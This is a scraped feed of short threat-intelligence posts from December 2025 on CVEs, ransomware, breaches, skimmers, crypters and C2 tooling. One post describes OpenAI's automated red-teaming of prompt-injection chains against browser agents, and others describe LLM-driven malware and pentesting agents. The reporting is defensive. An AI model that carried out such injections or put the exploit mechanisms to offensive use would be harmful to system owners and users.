The tradeoff is slightly reduced speaker volume, but it materially lowers battery-died-at-the-worst-time risk for long-term asset tracking. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tracking (Apple AirTag users) # Category: #Apple #AirTag #Security #AssetTracking #Privacy #Bluetooth #Gadgets #Review 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005774997483315437) 2025-12-29T22:56Z [--] followers, [--] engagements
"🚨 MongoBleed Exploitation Spreads as Defenders Race to Patch MongoDB. CyberScoop reports MongoBleed (CVE-2025-14847), a zlib-driven unauthenticated memory leak in widely deployed MongoDB versions, is now under active exploitation, with CISA adding it to KEV after a public PoC dropped Dec [--]. With tens of thousands of exposed instances (Shadowserver 75K; Censys 87K) and a bleed-style low-forensic footprint, stolen secrets (credentials/tokens) can enable rapid lateral movement and follow-on compromise. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Cloud & Internet-Exposed MongoDB #" [X Link](https://x.com/ThreatSynop/status/2005775601928642775) 2025-12-29T22:59Z [--] followers, [---] engagements
"🚨 Gentlemen Ransomware Disrupts Romania's Oltenia Energy Complex. A ransomware attack on Dec [--] encrypted files and knocked key business IT services offline (ERP, document management, email, website) at Romania's largest coal power producer, while the national energy supply was not impacted. The company isolated affected systems, notified authorities, and is restoring from backups as it investigates potential data theft.
🕷 Malware: Gentlemen ransomware 🎯 Target: Romania / Energy # Category: #Ransomware #Gentlemen #Romania #Energy #CriticalInfrastructure #IncidentResponse #BCP #CyberCrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005776145241849944) 2025-12-29T23:01Z [--] followers, [--] engagements
"🚨 US & Australia Confirm Active Exploitation of MongoBleed (CVE-2025-14847). US CISA and Australia's ACSC warn attackers are actively exploiting MongoBleed, a MongoDB zlib-related memory disclosure bug that can leak sensitive data (e.g. database passwords, cloud secrets) from vulnerable internet-exposed deployments. CISA added it to the KEV catalog and set a federal patch deadline of Jan [--], signaling high-confidence real-world abuse. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (internet-exposed databases; cloud environments) # Category: #MongoDB #MongoBleed #CVE2025_14847" [X Link](https://x.com/ThreatSynop/status/2005777294242054539) 2025-12-29T23:05Z [--] followers, [---] engagements
"🚨 Coupang to Split $1.17B in Vouchers After 33.7M-Account Data Breach. Coupang will begin issuing four single-use vouchers totaling [-----] won ($34) per affected user starting Jan [--] [----], after a breach discovered in mid-November that originated on June [--] and exposed Korean customers' PII (names, emails, addresses, order info). Investigators say the suspect retained data from [----] accounts and even dumped a MacBook Air in a river to destroy evidence, underscoring insider risk and forensic challenges at scale.
🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #PII" [X Link](https://x.com/ThreatSynop/status/2005777838176075927) 2025-12-29T23:07Z [--] followers, [--] engagements
"🚨 CrowdStrike Launches Falcon for IT Turnkey Automations (GA). CrowdStrike says Falcon for IT now offers generally available turnkey automations (prebuilt content packs) to automate common IT/security workflows, like application resilience/health checks, file indexing for investigations, and Linux device control, without custom scripting. This reduces operational overhead and speeds response by running automation through the existing Falcon sensor and providing dashboards to track outcomes. 🕷 Malware: N/A 🎯 Target: Global / Enterprise IT & SOC Operations # Category: #CrowdStrike #Falcon" [X Link](https://x.com/ThreatSynop/status/2005793005567897912) 2025-12-30T00:08Z [--] followers, [--] engagements
"🚨 70,000+ MongoDB Servers Exposed to MongoBleed zlib Memory-Leak Attacks. MongoDB's CVE-2025-14847 allows unauthenticated attackers to leak uninitialized heap memory via zlib-compressed traffic, potentially exposing secrets like credentials and API keys from vulnerable internet-facing instances. Immediate upgrades (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression are the primary mitigations. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Internet-exposed MongoDB # Category: #MongoDB #MongoBleed #CVE2025_14847 #Vulnerability #Exploit" [X Link](https://x.com/ThreatSynop/status/2005885897963679867) 2025-12-30T06:17Z [--] followers, [--] engagements
"🚨 Executives Say Cybersecurity Has Outgrown IT: Risk Now Drives Strategy. A Rimini Street global exec survey shows cyber threats are now the top external risk (54%), pushing security into enterprise risk management and continuity planning, while talent gaps and vendor pressure widen exposure.
43% already outsource cybersecurity (46% are considering it) and 35% cite vendor lock-in/forced upgrades as a risk driver. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Leadership (Board, C-suite, critical sectors) # Category: #CyberRisk #CISO #RiskManagement #SecurityStrategy #Outsourcing #TalentGap" [X Link](https://x.com/ThreatSynop/status/2005901602524184929) 2025-12-30T07:19Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Stolen After Oracle EBS Breach at Catering Supplier KC&D. Korean Air says attackers stole data for [-----] current/former employees (including names and bank account numbers) after compromising its former subsidiary and current catering supplier KC&D, which has been linked to the wider Oracle E-Business Suite (EBS) exploitation/extortion campaign. The incident underscores vendor concentration risk in aviation and how enterprise app zero-days can rapidly translate into high-impact employee fraud exposure. 🕷 Malware: N/A 🎯 Target: South Korea / Aviation (Employees) #" [X Link](https://x.com/ThreatSynop/status/2005932471192318282) 2025-12-30T09:22Z [--] followers, [--] engagements
"🚨 ServiceNow Buys Armis for $7.75B to Build an End-to-End Cyber-Physical Security Platform. ServiceNow agreed to acquire Armis in a $7.75B all-cash deal to expand exposure management and cyber-physical security across IT, OT, and medical devices. The goal is deeper asset visibility and faster risk prioritization via ServiceNow's security workflows as AI adoption increases attack surface complexity.
🕷 Malware: N/A 🎯 Target: Global / Enterprise (IT+OT+Medical devices) # Category: #ServiceNow #Armis #MergersAndAcquisitions #CyberPhysicalSecurity #ExposureManagement #OTSecurity #MedDeviceSecurity" [X Link](https://x.com/ThreatSynop/status/2005934649579577694) 2025-12-30T09:31Z [--] followers, [--] engagements
"🚨 CISA Loses Key Staffer Behind Pre-Ransomware Warnings Program. CISA's Pre-Ransomware Notification Initiative (PRNI), which alerts organizations when ransomware actors are preparing to strike, faces uncertainty after its lead, David Stern, resigned following a forced reassignment. The program has issued thousands of warnings since [----], and CISA estimates it helped prevent roughly $9B in economic damages, so disruption could reduce early-warning coverage for critical sectors. 🕷 Malware: N/A 🎯 Target: USA / Government & Critical Infrastructure # Category: #CISA #Ransomware #ThreatIntel" [X Link](https://x.com/ThreatSynop/status/2005935738160865464) 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 Palo Alto Networks: AI Security Is Really a Cloud Infrastructure Problem. A Palo Alto Networks survey says 99% of organizations saw at least one attack on AI systems in the past year and argues most of the real risk sits in the cloud foundations (identity, permissions, and monitoring) that run AI workloads. It recommends prioritizing identity security and integrating cloud telemetry directly into SOC workflows to reduce AI-driven exposure.
🕷 Malware: N/A 🎯 Target: Global / Enterprise Cloud & AI Workloads # Category: #AISecurity #CloudSecurity #PaloAltoNetworks #IAM #SOC #GenAI" [X Link](https://x.com/ThreatSynop/status/2005935800031101065) 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 How to Operationalize AI in the SOC: [--] Workflows That Actually Benefit. The article lays out practical ways to embed AI into SOC operations (detection engineering, threat hunting, code/tooling support, orchestration design, and reporting) while warning that out-of-the-box AI and unvalidated outputs create fragile, unsafe workflows. The key message: narrowly scope AI use cases, enforce human review gates for actions, and standardize prompts/guardrails so AI outputs are testable and repeatable. 🕷 Malware: N/A 🎯 Target: Global / SOC & Enterprise Security Operations # Category: #SOC #AISecurity" [X Link](https://x.com/ThreatSynop/status/2005959665234940078) 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 70,000+ MongoDB Servers Still Vulnerable to MongoBleed (CVE-2025-14847). MongoBleed is a zlib-related unauthenticated memory disclosure flaw that can leak sensitive heap data (credentials, tokens, keys) from vulnerable MongoDB deployments, with large numbers of internet-exposed instances still at risk. The key action is immediate patching to fixed builds (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression as a temporary mitigation. 🕷 Malware: N/A (Vulnerability: MongoBleed / CVE-2025-14847) 🎯 Target: Global / Internet-Exposed MongoDB # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2005959728673792417) 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 CISA Flags Actively Exploited MongoDB MongoBleed Flaw in KEV. CISA added CVE-2025-14847 to the KEV catalog after active exploitation, warning it lets unauthenticated attackers read uninitialized heap memory via a zlib header length-handling inconsistency, potentially leaking credentials/tokens from exposed MongoDB servers.
Federal agencies must remediate by Jan [--] [----] (BOD 22-01), making immediate patching/mitigation a priority for all internet-facing deployments. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB Servers # Category: #MongoDB #MongoBleed #CVE2025_14847 #KEV" [X Link](https://x.com/ThreatSynop/status/2005976043467772135) 2025-12-30T12:15Z [--] followers, [--] engagements
"🚨 [----] Cybersecurity M&A Mega-Deals: [--] Acquisitions Cleared the $1B Mark. SecurityWeek tallied 420+ cybersecurity M&A deals in [----] ($84B disclosed), with eight $1B+ transactions driving nearly $75B, led by Google's $32B Wiz deal and Palo Alto Networks' $25B CyberArk buy. The consolidation signals buyers prioritizing cloud, identity, and data-security platforms as must-have control planes for [----]. 🕷 Malware: N/A 🎯 Target: Global / Cybersecurity Industry (M&A) # Category: #Cybersecurity #MergersAndAcquisitions #MAndA #CloudSecurity #IdentitySecurity #DSPM #OTSecurity #MarketTrends 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005991205469929803) 2025-12-30T13:15Z [--] followers, [--] engagements
"🚨 LG Unveils Gallery TV to Challenge Samsung's The Frame at CES [----]. LG is entering the art TV market with a flush-mount Frame-style Gallery TV built on Mini-LED, with a matte/anti-glare screen, interchangeable frames, and a Gallery+ art subscription to display curated artwork when idle. The move signals intensifying competition in lifestyle TVs, where always-on display modes and ecosystem services (art stores, apps, smart-home integration) are becoming the differentiators, not just panel tech.
🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home TV market) # Category: #LG #GalleryTV" [X Link](https://x.com/ThreatSynop/status/2006023649371849109) 2025-12-30T15:24Z [--] followers, [--] engagements
"🚨 TCL Note A1 NXTPAPER: Digital Paper Tablet Brings 120Hz Full-Color Paper-Like Reading/Writing. TCL announced the Note A1 NXTPAPER, combining its NXTPAPER paper-like display tech with a full-color LCD and a 120Hz refresh rate to reduce ghosting while staying eye-comfort focused for long reading and stylus work. It's positioned as a Kindle Scribe/reMarkable alternative with productivity features (stylus + meeting transcription/translation) and is expected to launch via crowdfunding soon. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tech (Tablets, e-notes, productivity) # Category: #TCL #NXTPAPER" [X Link](https://x.com/ThreatSynop/status/2006024740071149999) 2025-12-30T15:29Z [--] followers, [--] engagements
"🚨 Legends Never Die: A Backstage Pass to Broadcom's [----] Cybersecurity Tour. Broadcom's Symantec and Carbon Black recap their [----] Legends Never Die conference circuit (e.g. Google Cloud Next, RSAC, Black Hat/DEF CON), emphasizing AI/ML-driven defense demos, partner ecosystem wins, and updated threat intel messaging. It's essentially a marketing-driven field report on how they're positioning enterprise security offerings and AI capabilities heading into [----]. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Security Teams & Channel Partners # Category: #Cybersecurity #ThreatIntel #SOC #AI #XDR" [X Link](https://x.com/ThreatSynop/status/2006025284907106389) 2025-12-30T15:31Z [--] followers, [--] engagements
"🚨 Trend Micro Helps INTERPOL's Operation Sentinel Bust Africa-Linked Digital Extortion Networks. Trend Micro says its intel mapped 2,700+ malicious infrastructures/IPs and detected 43,000+ digital extortion email attempts tied to Africa-region senders, supporting INTERPOL's Operation Sentinel, which led to [---] arrests and $3M recovered.
The campaign data shows extortion lures were primarily English/Portuguese and largely targeted victims outside Africa (notably the Americas and Europe), highlighting cross-continental monetization and the need for stronger email controls and takedown coordination. 🕷" [X Link](https://x.com/ThreatSynop/status/2006026437078200672) 2025-12-30T15:35Z [--] followers, [--] engagements
"🚨 HoneyMyte (Mustang Panda) Uses Signed Kernel Rootkit to Stealth-Deploy ToneShell. Kaspersky reports the HoneyMyte/Mustang Panda cluster using a signed Windows mini-filter driver (ProjectConfiguration.sys) to blind Microsoft Defender and inject the ToneShell backdoor into a decoy svchost process, with C2 traffic disguised as fake TLS [---] over TCP/443. This kernel-mode delivery boosts persistence and evasion, raising incident-response difficulty for targeted government networks in Myanmar and Thailand. 🕷 Malware: ToneShell (kernel-mode rootkit loader) 🎯 Target: Asia / Government (Myanmar" [X Link](https://x.com/ThreatSynop/status/2006042689385472039) 2025-12-30T16:40Z [--] followers, [--] engagements
"🚨 Samsung Previews CES [----] Home Audio: New Q-Series Soundbars + Music Studio Wi-Fi Speakers. Samsung is teasing its [----] audio lineup ahead of CES, adding refreshed Q-Series soundbars and new Music Studio Wi-Fi speakers aimed at tighter SmartThings/TV integration and more immersive AI-tuned playback. The update reinforces the ecosystem audio trend, where speakers and soundbars operate as coordinated endpoints across TVs and smart-home routines.
🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home Audio) # Category: #Samsung #CES2026 #Soundbars #WiFiSpeakers #SmartThings #HomeAudio" [X Link](https://x.com/ThreatSynop/status/2006043233978110001) 2025-12-30T16:42Z [--] followers, [--] engagements
"🚨 OpenAI: Prompt Injection May Never Be Solved for Browser Agents Like ChatGPT Atlas. OpenAI says it shipped a security update after internal automated red-teaming uncovered a new class of prompt-injection attacks, adding an adversarially trained model and stronger safeguards. It now uses an RL-trained automated attacker plus counterfactual rollouts to iterate on multi-step injection chains before they appear in the wild. 🕷 Malware: N/A 🎯 Target: Global / AI Browser Agents (Enterprise workflows: email, docs, web apps) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity" [X Link](https://x.com/ThreatSynop/status/2006043780294840560) 2025-12-30T16:44Z [--] followers, [--] engagements
"🚨 Magecart Fake Checkout Surge: 50+ Malicious Scripts Hijack Payment Flows. A large-scale Magecart operation is using 50+ modular JavaScript skimmers that detect the victim's payment gateway (e.g. Stripe/PayPal/Mollie) and dynamically inject localized fake payment forms to steal card and account data while evading modern defenses.
🕷 Malware: Magecart (malicious web skimmer scripts) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart #Ecommerce #WebSkimming #JavaScript #PaymentFraud #SupplyChain #Infostealer #DigitalSkimmer 🔗 URL: https://gbhackers.com/magecart-campaign/" [X Link](https://x.com/ThreatSynop/status/2006068320349401352) 2025-12-30T18:22Z [--] followers, [--] engagements
"🚨 ESET Warns AI-Powered Malware Is Now Operational: PromptLock Signals a New Ransomware Era. ESET reports that AI-driven malware is no longer theoretical, spotlighting PromptLock ransomware that can call LLMs (via the Ollama API) to generate and iteratively fix malicious Lua scripts at runtime, undermining signature-based detection. The same report also flags a sharp expansion in ransomware activity and a surge in BYOVD-style EDR-killer tooling, increasing the likelihood of fast, scalable intrusions across multiple sectors. 🕷 Malware: PromptLock (AI-powered ransomware) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2006069419261219326) 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915, CVSS 9.8). A critical authentication bypass in IBM API Connect lets remote attackers gain unauthorized access without credentials, impacting versions 10.0.8.0-10.0.8.5 and 10.0.11.0. Patch immediately (apply IBM iFix/security updates), and if you can't patch yet, disable Developer Portal self-service sign-up to reduce exposure.
🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management, IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity #PatchNow #DevSecOps 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006069481995374684) 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 CISA Flags Active Exploitation of MongoBleed (CVE-2025-14847) in MongoDB. CISA added CVE-2025-14847 to its KEV catalog after real-world exploitation was observed; the flaw stems from zlib-compressed protocol header length handling and can let unauthenticated attackers read uninitialized heap memory, potentially leaking credentials, tokens, or sensitive data from exposed MongoDB servers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) # Category: #MongoDB #CVE202514847 #MongoBleed #CISA #KEV #Vulnerability #DataLeak #DatabaseSecurity #PatchNow 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006071176188023052) 2025-12-30T18:33Z [--] followers, [--] engagements
"🚨 Massive Magecart Wave: 50+ Web Skimmers Inject Fake Checkout Pages. Researchers report a large Magecart operation using 50+ distinct malicious JavaScript skimmers that fingerprint the victim site's payment flow and dynamically inject localized fake checkout forms to steal card data and credentials while evading detection. The scale and modular design make this a high-impact e-commerce supply-chain risk, especially for sites relying on third-party scripts and tag managers.
🕷 Malware: Magecart (web skimmer JavaScript) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart" [X Link](https://x.com/ThreatSynop/status/2006097405649788955) 2025-12-30T20:17Z [--] followers, [--] engagements
"🚨 Coupang Offers $1.17B in Vouchers After Massive 33.7M-Account Data Breach. Coupang will issue four vouchers totaling [-----] won ($1.17B aggregate) to [----] million notified account holders starting Jan [--], after a breach that began June [--] [----] and exposed personal data (names, email, phone, addresses, some order history) but reportedly not payment or login credentials, highlighting escalating regulatory, class-action, and trust risk for major consumer platforms. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Logistics # Category: #DataBreach #Coupang #Korea #Privacy #PII #IncidentResponse" [X Link](https://x.com/ThreatSynop/status/2006112575512273356) 2025-12-30T21:18Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915) Exposes API Gateways to Remote Takeover. IBM warns of an authentication-bypass flaw (CVSS 9.8) that could let unauthenticated remote attackers access IBM API Connect, potentially enabling configuration tampering and downstream compromise of managed APIs. Affected versions (10.0.8.0-10.0.8.5 and 10.0.11.0) should apply IBM iFixes immediately; if patching is delayed, disable Developer Portal self-service sign-up as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management, IBM API Connect) # Category: #CVE202513915" [X Link](https://x.com/ThreatSynop/status/2006135830750822902) 2025-12-30T22:50Z [--] followers, [--] engagements
"🚨 Critical SmarterMail Flaw Lets Unauthenticated Attackers Upload Files and Potentially Achieve RCE. CVE-2025-52691 (CVSS 10.0) allows unauthenticated arbitrary file upload to any location on SmarterMail servers, which can be chained into remote code execution and full mail server takeover.
SmarterTools says builds before [----] are affected and urges upgrading to Build 9413+ immediately, especially for internet-facing mail servers. 🕷 Malware: N/A 🎯 Target: Global/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #ArbitraryFileUpload #EmailSecurity" [X Link](https://x.com/ThreatSynop/status/2006136374814994703) 2025-12-30T22:52Z [--] followers, [---] engagements
"🚨 CISA Flags Actively Exploited MongoBleed Bug in MongoDB Server (CVE-2025-14847). CVE-2025-14847 is a zlib-compressed protocol header length-handling flaw that lets unauthenticated attackers remotely read uninitialized heap memory, potentially leaking credentials, session tokens, or encryption keys from exposed MongoDB servers. CISA added it to the KEV catalog on Dec [--] [----] and set a Jan [--] [----] remediation deadline, making urgent patching and credential rotation a priority for any internet-facing instances. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2006136919168598271) 2025-12-30T22:54Z [--] followers, [--] engagements
"🚨 PoC Released for MongoBleed: 74K+ Exposed MongoDB Servers Still Unpatched. A public proof-of-concept for CVE-2025-14847 (MongoBleed) is driving urgency as Shadowserver reports [-----] internet-exposed MongoDB instances still running vulnerable versions. The bug enables unauthenticated heap-memory disclosure via MongoDB's zlib-compressed protocol handling, risking leakage of sensitive in-memory data unless servers are urgently patched or zlib compression is disabled as a temporary mitigation.
🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-exposed MongoDB) # Category:" [X Link](https://x.com/ThreatSynop/status/2006138009586917672) 2025-12-30T22:59Z [--] followers, [---] engagements
"🚨 Ex-Coupang Insider Tosses MacBook in River to Destroy Evidence After Massive Data Breach. A former Coupang employee allegedly used a stolen security key to access customer records, then smashed and dumped a MacBook Air weighted with bricks to erase traces, but investigators recovered the device and tied it to the suspect via serial number/iCloud. The case underscores how insider access + poor key controls can drive mega-breaches, and how forensics can still reconstruct activity even after attempted physical destruction. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Consumer Data #" [X Link](https://x.com/ThreatSynop/status/2006138552841625741) 2025-12-30T23:01Z [--] followers, [--] engagements
"🚨 Critical 0-Day Root RCE in XSpeeder Devices Exposes 70,000+ Hosts. CVE-2025-54322 is an unauthenticated root RCE in XSpeeder SXZOS devices where a web-auth component uses unsafe eval() on base64-decoded query input, enabling one-request command execution and rapid perimeter compromise. With 70K internet-exposed systems and an unresponsive vendor, defenders should urgently isolate/ACL these devices and hunt for web-shell-like artifacts and suspicious GET-based payload attempts. 🕷 Malware: N/A 🎯 Target: Global/Industrial & Branch Networking (XSpeeder SXZOS) # Category: #ZeroDay #RCE" [X Link](https://x.com/ThreatSynop/status/2006140187995144420) 2025-12-30T23:07Z [--] followers, [--] engagements
"🚨 Logitech Zone Wireless [--] ES Review: Business Headset Built to Tame Noisy Open Offices. Logitech's Zone Wireless [--] ES is positioned as an ANC-forward headset for clearer enterprise calls in loud environments, improving meeting confidentiality and voice intelligibility.
The security tradeoff is added endpoint surface (Bluetooth/dongle firmware and UC integrations), so it should be managed like any other corporate peripheral (updates, device controls, and policy). 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Unified Communications & Open Office) # Category: #Logitech #Headset #ANC" [X Link](https://x.com/ThreatSynop/status/2006193640012447947) 2025-12-31T02:40Z [--] followers, [--] engagements
"🚨 Defenders Falling Behind: Threat-Led Data Shows Attackers Evolve Faster Than Coverage. Tidal Cyber's [----] Threat-Led Defense Report finds adversaries rapidly shifting TTP execution (cloud/SaaS abuse, social engineering resurgence, ransomware fragmentation, and broader zero-day use), creating procedure-level blind spots where controls miss real intrusions even when the technique is known. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #ThreatIntel #ThreatLedDefense #TTPs #MITREATTACK #Ransomware #SocialEngineering #ZeroDay #SaaS #CloudSecurity #TidalCyber 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006255310856401015) 2025-12-31T06:45Z [--] followers, [--] engagements
"🚨 AI-Enhanced InternalWhisper Crypter Markets FUD Evasion Against Windows Defender. A new dark-web crypter/loader called InternalWhisper x ImpactSolutions claims an AI-driven metamorphic engine that rewrites 99% of code per build, producing signature-less binaries while using AES-256 runtime encryption and stealth loaders (direct syscalls, process hollowing, signed-binary sideloading) to evade AV/EDR, reducing the effectiveness of static detection and accelerating commodity malware deployment.
🕷 Malware: InternalWhisper x ImpactSolutions (AI-enhanced crypter/loader) 🎯 Target: Global/Windows" [X Link](https://x.com/ThreatSynop/status/2006255857378501043) 2025-12-31T06:47Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Ships Major Tunnel + UI Upgrades, Boosting C2 Operator Speed. AdaptixC2 v1.0 overhauls SOCKS4/5 tunneling to be RFC-compliant, adds IPv6 support, and improves client responsiveness via async execution/text batching, making port scans and pivoting more reliable and faster. It also adds remote shell/SSH-like terminal tabs plus new BOFs (LDAP, DCSync, nbtscan, runas) and introduces breaking DB changes, which matters because better legit red team tooling is routinely repurposed by real attackers. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Monitoring" [X Link](https://x.com/ThreatSynop/status/2006256401413193934) 2025-12-31T06:49Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Released With Faster, More Reliable Tunneling and UI Upgrades. AdaptixC2's latest release improves SOCKS4/5 tunneling (RFC compliance), adds IPv6 support, and boosts responsiveness via async client/server operations and text batching to prevent UI freezes. It also introduces a new profile system with autosave, updated session/listener management, and database-size controls that defenders should account for when hunting C2 activity.
🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Red Teams & Post-Exploitation Operations # Category: #AdaptixC2 #C2 #PostExploitation #RedTeam" [X Link](https://x.com/ThreatSynop/status/2006273195167326558) 2025-12-31T07:56Z [--] followers, [--] engagements "🚨 Open-Source AdaptixC2 v1.0 Launches With Faster SOCKS Tunnels and New BOFs AdaptixC2s v1.0 release improves SOCKS4/5 tunneling stability adds IPv6 support and introduces UI/workflow upgrades (async execution terminal tabs) plus new Beacon Object Files like LDAP and DCSyncfeatures that can materially increase attacker/operator efficiency if abused outside legitimate red teaming. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Defending Against Post-Exploitation C2 # Category: #AdaptixC2 #C2 #RedTeam #PostExploitation #SOCKS5 #IPv6 #BOF #ThreatHunting 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006273740020060507) 2025-12-31T07:58Z [--] followers, [--] engagements "🚨 Dark-Web InternalWhisper AI Crypter Claims FUD Evasion by Metamorphic Rewrites A threat actor is advertising InternalWhisper x ImpactSolutions an AI-enhanced metamorphic crypter that claims to generate signature-free builds by rewriting code per build encrypting payloads (AES-256) and using in-memory execution plus techniques like direct syscalls/process hollowing and signed-binary sideloading. If real it accelerates commodity malware at scale by degrading static detection and pushing defenders toward behavioral/telemetry-driven controls. 🕷 Malware: InternalWhisper x ImpactSolutions" [X Link](https://x.com/ThreatSynop/status/2006274283924840459) 2025-12-31T08:00Z [--] followers, [--] engagements "🚨 Critical Apache StreamPipes Flaw Lets Users Hijack Admin Accounts (CVE-2025-47411) A privilege-escalation bug in Apache StreamPipes (0.69.00.97.0) allows any authenticated non-admin to manipulate JWT/token user identity (e.g. 
swapping their username to an existing admin) and gain full administrative control enabling data access/tampering and pipeline compromise; upgrade to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics Platforms (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2006281895789674500) 2025-12-31T08:30Z [--] followers, [--] engagements "🚨 Critical Apache StreamPipes Bug Lets Low-Privilege Users Hijack Admin Control CVE-2025-47411 impacts Apache StreamPipes 0.69.00.97.0 allowing any authenticated non-admin to manipulate JWT/user-ID handling to impersonate an existing administrator and take over the platform. Upgrade to 0.98.0 immediately to prevent full pipeline/data tampering and backdoor account creation. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow #DataSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006290116550017062) 2025-12-31T09:03Z [--] followers, [--] engagements "🚨 MongoBleed Exploitation Hotspots: U.S. China and EU Lead Global Exposure MongoBleed (CVE-2025-14847) is a pre-auth zlib compression flaw in MongoDB that lets attackers remotely leak uninitialized process memory (e.g. credentials/tokens) from unpatched servers with large concentrations of exposed instances in China and the U.S. The bug is already being exploited prompting CISA KEV inclusion and rapid patching/mitigation pressure across cloud and hosting providers. 
🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (US China EU-heavy exposure) # Category: #MongoDB #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2006297728062468323) 2025-12-31T09:33Z [--] followers, [--] engagements "🚨 Mapping the Next Cold War: Why US Strategy on China and Russia Must Get Specific WIRED argues the US has drifted without a coherent grand strategy for great-power competition with China and Russia and that treating today as a simple Cold War analogy obscures key differences like economic interdependence and the rise of nonaligned mid-powers. 🕷 Malware: N/A 🎯 Target: Global/Geopolitics () # Category: #Geopolitics #NationalSecurity #ColdWar #China #Russia #USPolicy #CyberPolicy 🔗 URL: https://www.wired.com/story/discovering-the-dimensions-of-a-new-cold-war/" [X Link](https://x.com/ThreatSynop/status/2006313432975331722) 2025-12-31T10:36Z [--] followers, [--] engagements "🚨 NeuroSploit v2: AI-Powered Pentesting Framework Using GPT/Claude/Gemini/Ollama NeuroSploit v2 is a modular GitHub-hosted framework that uses specialized LLM agents (red team bug bounty malware analyst blue team) and integrates tools like Nmap Metasploit Nuclei and SQLMap to accelerate recon and vulnerability analysis. Its main risk is operational: it can compress high-skill workflows into repeatable playbooks so defenders should expect faster time-to-exploit and prioritize behavioral detection and strict tool/use governance. 🕷 Malware: NeuroSploit v2 (tool) 🎯 Target: Global/Offensive" [X Link](https://x.com/ThreatSynop/status/2006331985065546103) 2025-12-31T11:49Z [--] followers, [--] engagements "🚨 LinkedIn Job Scams Surge Globally: Fake Recruiters Monetize Jobseekers Desperation Fraudsters posing as employers on LinkedIn persuade applicants to pay fees (background checks onboarding training visa processing) with tactics varying by region and often escalating into credential theft or identity-fraud exposure. 
The bigger risk is organizational: stolen LinkedIn accounts and harvested personal data enable highly believable BEC-style impersonation and targeted spear-phishing into real companies. 🕷 Malware: N/A 🎯 Target: Global/Jobseekers & Recruiting (Social Media Platforms) # Category:" [X Link](https://x.com/ThreatSynop/status/2006347213371269363) 2025-12-31T12:50Z [--] followers, [--] engagements

"🚨 Shai-Hulud Supply Chain Worm Fueled $8.5M Trust Wallet Chrome Extension Heist Trust Wallet says Shai-Hulud [---] leaked its developer GitHub secrets, letting attackers use a stolen Chrome Web Store API key to publish a backdoored Trust Wallet extension (v2.68) that pulled malicious code from an attacker domain and drained [----] wallets ($8.5M) between Dec 24-26, highlighting how npm/GitHub credential theft can directly translate into consumer crypto theft via compromised release pipelines. 🕷 Malware: Shai-Hulud [---] (self-replicating npm supply-chain worm) + backdoored Trust Wallet Chrome" [X Link](https://x.com/ThreatSynop/status/2006347757791899852) 2025-12-31T12:52Z [--] followers, [--] engagements

